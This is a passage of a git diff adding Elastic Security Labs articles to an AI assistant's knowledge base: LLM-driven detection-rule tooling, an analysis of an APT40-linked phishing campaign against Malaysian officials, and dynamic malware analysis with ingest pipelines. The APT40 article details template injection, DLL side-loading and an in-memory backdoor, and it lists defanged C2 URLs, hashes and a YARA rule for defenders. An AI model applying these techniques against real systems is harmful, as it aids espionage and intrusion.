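+        "Elastic endpoint events without repeating specific field values:\n{events}"
+    ),
+)
+
+# Step 2: turn the behavioral summary into an EQL query.
+to_eql = LLMChain(
+    llm=llm,
+    prompt=ChatPromptTemplate.from_template(
+        "Write a single EQL query that detects the following behavior. "
+        "Return only the query:\n{behavior}"
+    ),
+)
+
+chain = SimpleSequentialChain(chains=[summarize, to_eql])
+with open("gold.json") as f:  # exported sample events, as in Figure 2
+    print(chain.run(f.read()))
+```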
+
+![Figure 2: Query Generation POC](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image44.gif)
+Figure 2: Query Generation POC
+
+For experimentation purposes, we simulated suspicious activity using our [Red Team Automation (RTA)](https://github.com/elastic/detection-rules/tree/main/rta) scripts and captured the endpoint activity in the SIEM through the Elastic Agent. Figure 2 displays sample events from the Elastic stack, exported to gold.json test files, that included the essential event fields for query generation.
+
+We then asked GPT to analyze the event collection covering the RTA execution time window and focus on events with suspicious behavior. In our POC, the prompt asked GPT to pinpoint key values linked to potential anomalies. We then followed with subsequent prompts to chunk the events and summarize all of the activity. Based on all the summaries, we asked GPT to generate a list of indicators, without keying on specific values. With this short list of suspicious behaviors, we then asked GPT to generate the query. A significant advantage of our long-term open-source development is that GPT-related models are familiar with Elastic content, and so we benefited by not having to overfit our prompts.
+
+Even though going from raw data to an EQL query was conceptually straightforward, we still encountered minor hiccups like service availability with Azure OpenAI. It was also relatively cheap: we estimate it cost us around $160 over the week to use the OpenAI and Azure OpenAI inference and embedding APIs. We also explored using the GCP Vertex AI Workbench to facilitate collaborative work on Jupyter notebooks, but the complexity of the available open source (OSS) models made them challenging to adopt during the short ONWeek.
+
+![Figure 3: May 2023 ONWeek Major Outcomes](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image2.png)
+Figure 3: May 2023 ONWeek Major Outcomes
+
+We also used ONWeek to mature our roadmap, for example by planning to expand beyond in-memory, library-based vector search implementations to more performant, scalable, and production-ready data stores of our detection-rules content in Elasticsearch. Our initial results demonstrated the potential and viability of integrating GenAI into the analyst workflow (e.g. allowing event time-window selection, query generation, and timeline addition). Based on these early wins, we added plans to our internal roadmap to pursue further LLM R&D and decided to tackle one of our internal productivity workflows.
+
+## A New Horizon: Generating Investigation Guides
+
+Over the years, Elastic Security Labs has matured its content, starting in 2020 by adding the Investigation Guide Security feature and then standardizing those guides in 2021. By 2023, with over 900 [rules](https://github.com/elastic/detection-rules/tree/main/rules) in place, we are actively seeking an efficient way to generate highly accurate, detailed, and standardized guides for all 900+ pre-built rules.
+
+Melding traditional ML approaches (like similarity vector search) with our prompt engineering special sauce, our team created a new prototype centered around investigation guide generation called Rulecraft. Now, with just a rule ID in hand, our rule authors can generate a baseline investigation guide in mere minutes! 
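+As a deliberately simplified stand-in for the similarity vector search we describe below (we used embeddings and a vector database; the TF-IDF approach, rule descriptions, and threshold here are illustrative assumptions only), grounding a "Related Rules" suggestion in a similarity lookup rather than in the LLM's memory could look like this:
+
+```
+# Simplified stand-in: rank existing rule descriptions against a new rule with
+# TF-IDF cosine similarity (illustrative; not Rulecraft's actual implementation).
+from sklearn.feature_extraction.text import TfidfVectorizer
+from sklearn.metrics.pairwise import cosine_similarity
+
+existing_rules = [
+    {"name": "Rule A", "description": "Detects binaries executed from shared memory directories."},
+    {"name": "Rule B", "description": "Identifies unusual PID or lock files created in /var/run."},
+]
+new_rule_description = "Detects processes started from /dev/shm on Linux hosts."
+
+corpus = [r["description"] for r in existing_rules] + [new_rule_description]
+vectors = TfidfVectorizer().fit_transform(corpus)
+scores = cosine_similarity(vectors[-1], vectors[:-1]).ravel()
+
+# Only suggest rules above an (arbitrary) similarity threshold.
+related = [r["name"] for r, s in zip(existing_rules, scores) if s > 0.2]
+print(related)
+```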
+
+![Figure 4: Sample Investigation Guide](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image3.png)
+Figure 4: Sample Investigation Guide
+
+In this initial exploration, we supplied detection rules to GPT, but limited the input to a few fields from the rules, such as the description and name. We also attempted to supply the query, but it appeared to overfit the output to the outcome we desired. Initially, we provided a simple prompt with these fields to evaluate how well GPT could generate a decent investigation guide with minimal effort. As we explored further, it became evident that we could benefit from chaining multiple prompts, akin to what we did during the EQL query generation experiment. So we spent time creating prompts tailored to distinct sections of the investigation guide. Segmenting the prompts not only granted us greater flexibility but also addressed areas where GPT faltered, such as the "Related Rules" section, where GPT tended to hallucinate most. In cases like this, we used traditional ML methods like similarity search and integrated our rules into a vector database for enhanced context.
+
+Next, we identified opportunities to inject additional context into specific sections. To ensure uniformity across our guides, we curated a library of approved content and language for each segment. This library then guided GPT in generating and formatting responses similar to our established standard messages. We then compared GenAI-produced guides with their manually crafted counterparts to identify other formatting discrepancies, general errors introduced by GPT, and even broader issues with our prompts.
+
+Based on these findings, we chose to improve our generated content by adjusting the prompts instead of using post-processing techniques like string formatting. While the automated investigation guides aren't perfect, they offer our detection engineers a solid starting place. In the past, investigation guides have enhanced our PR peer review process by providing the reviewer with more context about the rule's expected behavior. We can now generate the base guide, tune it, and add more detail as needed, instead of having the detection engineer start from scratch.
+
+To bring this capability directly to our detection engineers, we integrated Rulecraft into a GitHub action workflow, so they can generate guides on demand. We also produced the additional 650+ guides in a mere 13 hours, a task that would traditionally span months. The automation allows us to make small tweaks and quickly regenerate base content for rules missing investigation guides. Again, these guides are still subject to our stringent internal review, but the time and effort saved by leveraging GenAI for our preliminary drafts is incredible.
+
+## Charting the Future: Next Steps
+
+Our research and development journey continues, with a central focus on refining our approach to content generation with LLMs and more thoroughly validating our results. Here’s a short list of our priorities now that we’ve explored the viability and efficacy of integrating LLMs into our detection engineering workflow:
+ - Compare proprietary models with the latest open-source models.
+ - Further refine our experimentation process, including event filtering, prompt optimization, and exploring various model parameters.
+ - Create a test suite to validate our results and prevent regressions.
+ - Seamlessly integrate our R&D advancements into the [Elastic AI Assistant](https://www.elastic.co/blog/open-security-impact-elastic-ai-assistant). 
+
+Overall, we want to dramatically increase our investigation guide coverage and reduce the time taken to craft these guides from the ground up. Each investigation guide provides analysts with detailed, step-by-step instructions and queries for triaging alerts. With a customer-first mentality at the forefront of our [source code](https://www.elastic.co/about/our-source-code), we aim to elevate the analyst experience with more investigation guides of even higher quality, translating into less time spent by our customers on false positive (FP) analysis and alert triage.
+
+## Summary
+
+Keeping with the spirit of open innovation and transparency, Elastic Security Labs has begun its generative AI voyage to enhance the productivity of our threat detection processes. Our efforts continue to evolve, incorporating prompt engineering and traditional ML approaches on a case-by-case basis and resulting in more R&D proof-of-concepts like “LetmeaskGPT” and "Rulecraft". The latter POC has significantly reduced the time required to craft baseline guides, improved the analyst experience, and reduced the effort spent on false positive analysis. There’s so much more to do and we want to include you on our journey! While we've made strides, our next steps include further refinement, developing a framework to rigorously validate our results, and exploring opportunities to operationalize our R&D, ensuring we remain at the forefront of security advancements.
+
+We’re always interested in hearing about use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!
+
+Also, feel free to check out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst:
+ - Learn how to responsibly use [ChatGPT with Elasticsearch](https://www.elastic.co/blog/chatgpt-elasticsearch-openai-meets-private-data)
+ - See the new Elastic [AI Assistant](https://www.elastic.co/blog/introducing-elastic-ai-assistant), the open, generative AI sidekick powered by ESRE, and [get set up](https://www.elastic.co/guide/en/security/current/security-assistant.html#set-up-ai-assistant)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md
new file mode 100644
index 0000000000000..0c24f667d04e6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md
@@ -0,0 +1,238 @@
+---
+title: "A close look at the advanced techniques used in a Malaysian-focused APT campaign"
+slug: "advanced-techniques-used-in-malaysian-focused-apt-campaign"
+date: "2022-06-22"
+description: "Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise." 
+author:
+ - slug: samir-bousseaden
+ - slug: daniel-stepanic
+ - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-castle-tower.jpg"
+category:
+ - slug: campaigns
+---
+
+The Elastic Security Intelligence & Analytics Team researches adversary innovations of many kinds, and has recently focused on an activity group that leveraged remote templates, VBA code evasion, and DLL side-loading techniques. Based on code similarity and shared tactics, techniques, and procedures (TTPs), the team assessed this activity to be possibly linked to a China-based group known as APT40, or Leviathan. The group’s campaign appears to target Malaysian government officials with a lure regarding the 2020 Malaysian political crisis.
+
+## Anatomy of the attack
+
+![Figure 1: Original image](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/1-leviathan-apt-blog-original-image.jpg)
+
+![Figure 2: Lure document image](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/2-leviathan-apt-blog-lure-document-image.jpg)
+
+To initiate their advanced persistent threat (APT) campaign, the group likely delivered a Microsoft Word document as a phishing lure attachment. The image used in the lure (Figure 2) appears to be crafted from a broadcast announcement shared by a Malaysian blogger (Figure 1). The lure image includes the same broadcast time, but the date and speech topic are removed. Once this attachment is opened, a decoy document is presented while, behind the scenes, the following actions take place:
+
+- The lure document downloads the remote template RemoteLoad.dotm
+- The remote template executes VBA macro code
+- The VBA macro code unpacks two embedded base64-encoded DLLs (sl1.tmp and sl2.tmp) to c:\users\public\ and executes them
+
+This technique is known as template injection, which you may recall from our [Playing defense against Gamaredon Group blog post](https://www.elastic.co/blog/playing-defense-against-gamaredon-group). It is an effective approach used by adversaries to bypass perimeter controls such as email gateways.
+
+![Figure 4: Obfuscation of MZ/PE header base64](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/4-leviathan-apt-blog-obfuscation.jpg)
+
+Both embedded DLLs (sl1.tmp and sl2.tmp) are similar and export the same function names: RCT and RCP. The first DLL (sl1.tmp) is used to download a benign executable called LogiMailApp.exe and an associated library LogiMail.dll, and the second DLL (sl2.tmp) is used to execute LogiMailApp.exe, which automatically attempts to load LogiMail.dll due to an inherent DLL search-order vulnerability we’ll cover shortly. 
+
+| File name | File type | Size (bytes) | MD5 | Compile time |
+| --------------- | --------- | ------------ | -------------------------------- | ------------------------- |
+| LogiMailApp.exe | Win32 EXE | 311656 | 850a163ce1f9cff0367854038d8cfa7e | 2012-09-26 22:13:13+00:00 |
+| LogiMail.dll | Win32 DLL | 105984 | b5a5dc78fb392fae927e9461888f354d | 2020-06-03 04:08:29+00:00 |
+| sl1.tmp | Win32 DLL | 3072 | ccbdda7217ba439dfb6bbc6c3bd594f8 | 2019-11-29 17:15:29+00:00 |
+| sl2.tmp | Win32 DLL | 3072 | dbfa006d64f39cde78b0efda1373309c | 2019-11-29 21:23:44+00:00 |
+
+_Table 1: Dropped files metadata_
+
+![Figure 5: Download and execution of LogiMailApp.exe and LogiMail.dll](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/5-leviathan-apt-blog-download-execution.jpg)
+
+This implementation stood out to our researchers due to several behavioral idiosyncrasies:
+
+- The Microsoft Office application winword.exe loads the sl1.tmp and sl2.tmp DLLs using the LoadLibraryA method, which is moderately rare
+- These DLLs run explicit commands or install a payload from a URL using the CallWindowProcA method, which appears to be exceptionally rare
+- Both DLLs are deleted after execution
+
+![Figure 6: Download and execution module deletion](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/6-leviathan-apt-blog-module.jpg)
+
+## Embedded DLLs
+
+The embedded DLLs, sl1.tmp and sl2.tmp, have very limited functionality, exporting only the RCP and RCT functions. The RCP function implements the WinExec method to execute commands, while the RCT function uses the URLDownloadToFileA method to download a file from a specified URL.
+
+![Figure 7: Exported functions – RCP and RCT](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/7-leviathan-apt-blog-exported-functions.jpg)
+
+## DLL side-loading a backdoor
+
+LogiMailApp.exe, which is downloaded by sl1.tmp and executed by sl2.tmp, is vulnerable to a form of DLL search-order hijacking called side-loading, which automatically searches for and executes LogiMail.dll if found in the same directory. Forms of DLL search-order hijacking can be used with many third-party software applications. In this case, search-order hijacking was used to load a backdoor that exports the following notable functions:
+
+![Figure 8: LogiMail.dll exports table](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/8-leviathan-apt-blog-logimail-exports.jpg)
+
+![Figure 9: LogiMailApp.exe – Logitech camera software](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/9-leviathan-apt-blog-logitech-software.jpg)
+
+![Figure 10: LogiMail.dll side-loading](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/10-leviathan-apt-blog-side-loading.jpg)
+
+The adversary-created binary LogiMail.dll exports the function DllGetClassObject, which contains critical logic for the execution flow of this sample:
+
+1. Download an AES-encrypted second stage object to %TEMP%\~liseces1.pcs
+2. Derive a 128-bit AES key and initialization vector from the SHA256 of a hardcoded string
+3. Read and decrypt %TEMP%\~liseces1.pcs in memory using the ReadFile and CryptDecrypt functions
+4. 
Delete %TEMP%\~liseces1.pcs from disk + +![Figure 11: Encrypted URL and hardcoded key](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/11-leviathan-apt-blog-encrypted-url.jpg) + +![Figure 12: Decrypted second stage URL and temp staging file](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/12-leviathan-apt-blog-decrypted-second-stage.jpg) + +![Figure 13: Second stage download, in-memory decryption, execution, and file deletion](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/13-leviathan-apt-blog-second-stage-download.jpg) + +## Second stage backdoor + +The decrypted second stage backdoor is mapped into memory and then its original entry point (OEP) is called, thus bypassing successful detections based on file system scanning. + +![Figure 14: LogiMail.dll — Resolving needed functions to map second stage PE into memory](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/14-leviathan-apt-blog-resolving-needed-functions.jpg) + +![Figure 15: The second stage implant mapped in LogiMailApp.exe memory](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/15-leviathan-apt-blog-second-stage-mapped.jpg) + +Both the payload staging server and the second stage infrastructure use dynamic DNS: + +![Figure 16: C2 HTTP POST request to /postlogin](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/16-leviathan-apt-blog-c2.jpg) + +This payload supports the following capabilities: + +- Basic anti-debug checks +- System and user discovery +- Execution via command line +- File discovery, upload, and download +- Persistence via run registry +- Encrypt C2 traffic using same AES key + +![Figure 17: System and user discovery](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/17-leviathan-apt-blog-system-discovery.jpg) + +![Figure 18: Execution via command-line](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/18-leviathan-apt-blog-execution-command-line.jpg) + +![Figure 19: File discovery, upload, and download](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/19-leviathan-apt-blog-file-discovery.jpg) + +## Possible APT40/Leviathan connection + +Earlier in the year, the Malaysian Computer Emergency Response Team (MyCERT) issued an [advisory](https://www.mycert.org.my/portal/advisory?id=MA-774.022020) related to espionage activity targeting their country. The report listed different TTPs and included multiple samples and other technical indicators that align with a threat group known as APT40/Leviathan. + +At a high level, this sample follows the continued trend of targeting Malaysian victims using specific TTPs such as remote templates, employing macros, using DLL side-loading techniques, and leveraging an in-memory implant with dynamic DNS for command and control. More specifically, the second stage implant from this lure shares unique strings and URL references and contains similar functionality that correlates with the previous reporting for APT40/Leviathan. With these similarities, our Intelligence & Analytics Team assesses with moderate confidence that this activity is linked to APT40/Leviathan. 
+ +Implant String Similarities with MyCERT Sample: + +- /list_direction +- /post_document +- /post_login +- Open Remote File %s Failed For: %s +- Open Pipe Failed %s +- Download Read Path Failed %s +- %02X-%02X-%02X-%02X-%02X-%02X +- Software\Microsoft\Windows\CurrentVersion\Run +- ntkd + +![](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/20-leviathan-apt-blog-shared-strings.jpg) + +![Figure 20: Shared strings with MyCERT sample - 8a133a382499e08811dceadcbe07](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/21-leviathan-apt-blog-shared-strings-2.jpg) + +## Conclusion + +In this post, we highlighted a recent sample that most likely represents the work of a highly organized adversary. Activity groups like this are significant for everyone to take notice of, if only because they represent a higher maturity level of post-exploit innovation. Their cutting edge TTPs today end up being everyone’s run of the mill tomorrow; it’s important to learn from these events. + +We hope that by sharing some of these insights, we can help raise awareness and continue to focus on protecting the world's data from attack. To enable organizations further, we’ve added all the observed MITRE ATT&CK® techniques and indicators of compromise (IoCs) below. + +### MITRE ATT&CK® techniques + +- [T1193 - Spearphishing Attachment](https://attack.mitre.org/techniques/T1193/) +- [T1221 - Template Injection](https://attack.mitre.org/techniques/T1221/) +- [T1060 - Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1060/) +- [T1073 - DLL Side-Loading](https://attack.mitre.org/techniques/T1073/) +- [T1129 - Execution through Module Load](https://attack.mitre.org/techniques/T1129/) +- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/) +- [T1107 - File Deletion](https://attack.mitre.org/techniques/T1107/) +- [T1140 - Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/) +- [T1059 - Command-Line Interface](https://attack.mitre.org/techniques/T1059/) + +### Indicators of Compromise (IOCs) + +#### File names and paths + +``` +Bubar Parlimen.zip +Bubar Parlimen.docx +RemoteLoad.dotm +C:\Users\Public\sl1.tmp +C:\Users\Public\sl2.tmp +C:\Users\*\AppData\Local\Temp\~liseces1.pcs +C:\Users\*\AppData\Local\Microsoft\Office\LogiMailApp.exe +C:\Users\*\AppData\Local\Microsoft\Office\LogiMail.dll +``` + +#### Registry keys + +``` +HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ntkd +``` + +#### URLs + +``` +hxxps[:]//armybar[.]hopto[.]org/LogiMail.dll +hxxps[:]//armybar[.]hopto[.]org/LogiMailApp[.]exe +hxxps[:]//armybar[.]hopto[.]org/Encrypted +hxxp[:]//tomema.myddns[.]me/postlogin +hxxp[:]//tomema[.]myddns[.]me/list_direction +hxxp[:]//tomema[.]myddns[.]me/post_document +``` + +#### IPs + +``` +104[.]248[.]148[.]156 +139[.]59[.]31[.]188 +``` + +#### HTTPS certificate + +``` +74b5e317527c93539dbaaf84d6a61da92a56012a +``` + +#### Hashes + +``` +523cbdaf31ddc920e5b6c873f3ab42fb791fb4c9d1f4d9e6a7f174105d4f72a1 +ab541df861c6045a17006969dac074a7d300c0a8edd0a5815c8b871b62ecdda7 +145daf50aefb7beec32556fd011e10c9eaa71e356649edfce4404409c1e8fa30 +93810c5fd9a287d85c182d2ad13e7d30f99df76e55bb40e5bc7a486d259810c8 +925f404b0207055f2a524d9825c48aa511199da95120ed7aafa52d3f7594b0c9 +feca9ad5058bc8571d89c9d5a1eebce09e709cc82954f8dce1564e8cc6750a77 +06a4246be400ad0347e71b3c4ecd607edda59fbf873791d3772ce001f580c1d3 +77ef350639b767ce0a748f94f723a6a88609c67be485b9d8ff8401729b8003d2 +``` + +### YARA + +``` +rule 
APT_APT40_Implant_June2020 { + meta: + version = "1.0" + author = "Elastic Security" + date_added = "2020-06-19" + description = "APT40 second stage implant" + strings: + $a = "/list_direction" fullword wide + $b = "/post_document" fullword wide + $c = "/postlogin" fullword wide + $d = "Download Read Path Failed %s" fullword ascii + $e = "Open Pipe Failed %s" fullword ascii + $f = "Open Remote File %s Failed For: %s" fullword ascii + $g = "Download Read Path Failed %s" fullword ascii + $h = "\\cmd.exe" fullword wide + condition: + all of them +} +``` + +### References + +- [https://www.mycert.org.my/portal/advisory?id=MA-774.022020](https://www.mycert.org.my/portal/advisory?id=MA-774.022020) + +- [https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/](https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/) +- [https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html](https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html) +- [https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache](https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache) diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md new file mode 100644 index 0000000000000..4d4c84de5a7c1 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md @@ -0,0 +1,232 @@ +--- +title: "An Elastic approach to large-scale dynamic malware analysis" +slug: "an-elastic-approach-to-large-scale-dynamic-malware-analysis" +date: "2023-07-31" +description: "This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework." +author: +- slug: ruben-groenewoud +- slug: remco-sprooten +image: "blog-thumb-steel-engine.jpg" +category: +--- +## Introduction + +In previous publications, we have written about Detonate: how we built it and how we use it within Elastic for malware analysis. This publication delves deeper into using Detonate for dynamic large-scale malware analysis. + +At a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. For more information about Detonate, check out [Click, Click… Boom! Automating Protections Testing with Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate). + +A significant portion of the data generated during execution consists of benign and duplicate information. When conducting dynamic malware analysis on a large scale, managing the vast amount of low-value data is a considerable challenge. To address it, we took advantage of several Elastic ingest pipelines, which we leveraged to effectively filter out noise from our datasets. This application of ingest pipelines enabled us to conveniently analyze our large volumes of malware data and identify several malicious behaviors that we were already interested in. + +This research examines the concept of ingest pipelines, exploring their different types and applications, and how to implement them. 
We will then walk through a comprehensive workflow incorporating these ingest pipelines. We will discuss our scripts and the methods that we created in order to automate the entire process. Finally, we will present our results and discuss how the workflow shared in this publication can be leveraged by others to obtain similar outcomes. + +### Overview + +In order to accomplish our large-scale malware analysis goals, we required effective data management. An overview of the chained ingest pipelines and processors that we built is shown below: + +![Ingest pipeline process overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image1.png) + +In summary, we fingerprint known good binaries and store those fingerprints in an enrich index. We do the same thing when we detonate malware or an unknown binary, using a comparison of those fingerprints to quickly filter out low-value data. + +### Ingest pipelines + +[Ingest pipelines](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html) are a powerful feature that allows you to preprocess and transform data before indexing it into Elasticsearch. They provide a way to perform various actions on incoming documents, such as enriching the data, modifying fields, extracting information, or applying data normalization. Ingest pipelines can be customized to meet specific data processing requirements. Our objective was to create a pipeline that differentiates known benign documents from a dataset containing both benign and malicious records. We ingested large benign and malicious datasets into separate namespaces and built pipelines to normalize the data, calculate fingerprints, and add a specific label based on certain criteria. This label helps differentiate between known benign and unknown data. + +### Normalization + +Normalization is the process of organizing and transforming data into a consistent and standardized format. When dealing with lots of different data, normalization becomes important to ensure consistency, improve search and analysis capabilities, and enable efficient data processing. + +The goal is to make sure documents with unique identifiers are no longer unique. For example, we remove the unique 6-character filename of the Elastic Agent in the " `/opt/Elastic/Agent/data/`" directory after installation. This ensures data from different Elastic Agents can be fully comparable, leading to more filtering opportunities in later pipeline phases. + +To accomplish this, we leveraged the [gsub pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/gsub-processor.html). It allowed us to apply regex-based transformations to fields within the data pipeline. We performed pattern matching and substitution operations to normalize event data, such as removing special characters, converting text to lowercase, or replacing certain patterns with standardized values. + +By analyzing our dataset, we discovered a set of candidates that would require normalization, and created a simple Python script to generate a list of gsub processors based on the matching value and the replacement value. The script that we leveraged can be found on [GitHub](https://github.com/elastic/labs-releases/tree/main/tools/malware_research). Using the output of the script, we can leverage dev tools to create a pipeline containing the generated gsub processors. + +Prior to utilizing the normalization pipeline, documents would contain random 6 character strings for every single Elastic agent. 
An example is displayed below.
+
+![Document before normalization](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image6.png)
+
+After ingesting and manipulating the documents through the normalization pipeline, the result looks like the following.
+
+![Document after normalization](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image13.png)
+
+When all documents are normalized, we can continue with the fingerprint calculation process.
+
+### Fingerprint calculation
+
+Fingerprint calculations are commonly used to generate a unique identifier for documents based on their content. The [fingerprint processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/fingerprint-processor.html) provides a convenient way to generate such identifiers by computing a hash value based on the specified fields and options, allowing for efficient document deduplication and comparison. The processor offers various options, including algorithms (such as MD5 or SHA-1), target fields for storing the generated fingerprints, and the ability to include or exclude specific fields in the calculation.
+
+We needed to calculate the fingerprints of documents ingested into Elasticsearch from several sources and integrations, such as endpoint, [auditd manager](https://docs.elastic.co/integrations/auditd_manager), packetbeat, [file integrity monitoring](https://docs.elastic.co/integrations/fim), etc. To calculate the fingerprints, we first needed to specify which fields we wanted to calculate them for. Because different data sources use different fields, it was important to create separate processors for each data type. For our use case, we ended up creating a different fingerprint processor for the following set of event categories:
+
+![Gsub ingest processor](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image20.jpg)
+
+By specifying a condition, we ensure that each processor only runs on its corresponding dataset.
+
+![Event filter example](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image21.jpg)
+
+The fields included in these processors are of the utmost importance, as the wrong choice can make a fingerprint less stable than expected, and an empty field can even result in a non-functional pipeline. For example, when working with network data, it might initially make sense to include the protocol, destination IP, destination port, source IP, and source port. But this will lead to too much noise in the pipeline: the socket that is opened on a system will use an ephemeral source port, which results in many unique fingerprints for otherwise identical network traffic. Other fields that may be subject to change relate to file sizes, version numbers, or specific text fields that are not being parsed. Normalization sometimes preserves fields that aren't useful for fingerprinting, and the more specific the fingerprint, the less useful it tends to be. Fingerprinting by file hash illustrates this: adding even a single space to a file causes a new hash to be calculated, which would break an existing hash-based fingerprint of the file.
+
+Field selection is a tedious process but vital for good results. For a specific integration, like auditd manager, we can find the [exported fields](https://github.com/elastic/integrations/tree/main/packages/auditd_manager) on [GitHub](https://github.com/elastic/integrations/tree/main/packages) and pick the ones that seem useful for our purposes. 
An example of the processor that we used for `auditd\_manager` can be found in the image below. + +![Example of the event's fingerprint fields used for the calculation.](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image12.png) + +### Enrichment process + +The [enrich ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html) is used for enriching incoming documents with additional information from external data sources. It allows you to enrich your data by performing lookups against an index or data set, based on specific criteria. Common use cases for the enrich ingest pipeline include augmenting documents with data from reference datasets (such as geolocation or customer information) and enriching logs with contextual information (like threat intelligence labels). + +For this project we leveraged enrich pipelines to add a unique identifier to the ingested document if it met certain criteria described within an enrich policy. To accomplish this, we first ingested a large and representative batch of benign data using a combination of normalization and fingerprint calculation pipelines. When the ingestion was completed, we set up several [enrich policies](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest-enriching-data.html) through the [execute enrich policy API](https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html). The execution of these enrich policies will create a set of new .enrich-\* system indices. The results stored within these indices will later be used by the pipelines used to ingest mixed (benign and malicious) data. + +This will make more sense with an example workflow. To leverage the enrich ingest pipeline, we first need to create enrich policies. As we are dealing with different data sources - meaning network data looks very different from auditd manager data - we will have to create one enrich policy per data type. In our enrich policy we may use a query to specify which documents we want to include in our enrich index and which ones we want to exclude. An example enrich policy that should add all auditd manager data to the enrich index, other than the data matching three specific match phrases, is displayed below. + +![Creation of the enrich policy](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image14.jpg) + +We are leveraging the “fingerprint” field which is calculated in the fingerprint processor as our match field. This will create an index filled with benign fingerprints to be used as the enriching index within the enrich pipeline. + +After creating this policy, we have to execute it for it to read the matching index, read the matching field, query for inclusions and exclusions, and create the new .enrich-\* system index. We do this by executing a POST request to the \_execute API. + +![Example API request to execute the enrich policy](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image18.jpg) + +We set wait_for_completion=false to make sure that the policy doesn’t time out. This might occur if the dataset is too large. When we navigate to index management and include hidden indices, we can see that the index is created successfully. 
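+For reference, the same two steps expressed with the Python Elasticsearch client might look like the sketch below. The policy name, source index, and exclusion query are placeholder assumptions rather than the exact policies we used.
+
+```
+# Illustrative sketch: create and execute an enrich policy keyed on the
+# "fingerprint" field (names, index patterns, and the query are placeholders).
+from elasticsearch import Elasticsearch
+
+es = Elasticsearch("https://localhost:9200", api_key="<api-key>")
+
+es.enrich.put_policy(
+    name="benign-auditd-fingerprints",
+    match={
+        "indices": "logs-auditd_manager.auditd-benign",
+        "match_field": "fingerprint",
+        "enrich_fields": ["fingerprint"],
+        "query": {
+            "bool": {
+                "must_not": [
+                    {"match_phrase": {"process.name": "elastic-agent"}}
+                ]
+            }
+        },
+    },
+)
+
+# Build the hidden .enrich-* index in the background; don't block on completion.
+es.enrich.execute_policy(
+    name="benign-auditd-fingerprints",
+    wait_for_completion=False,
+)
+```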
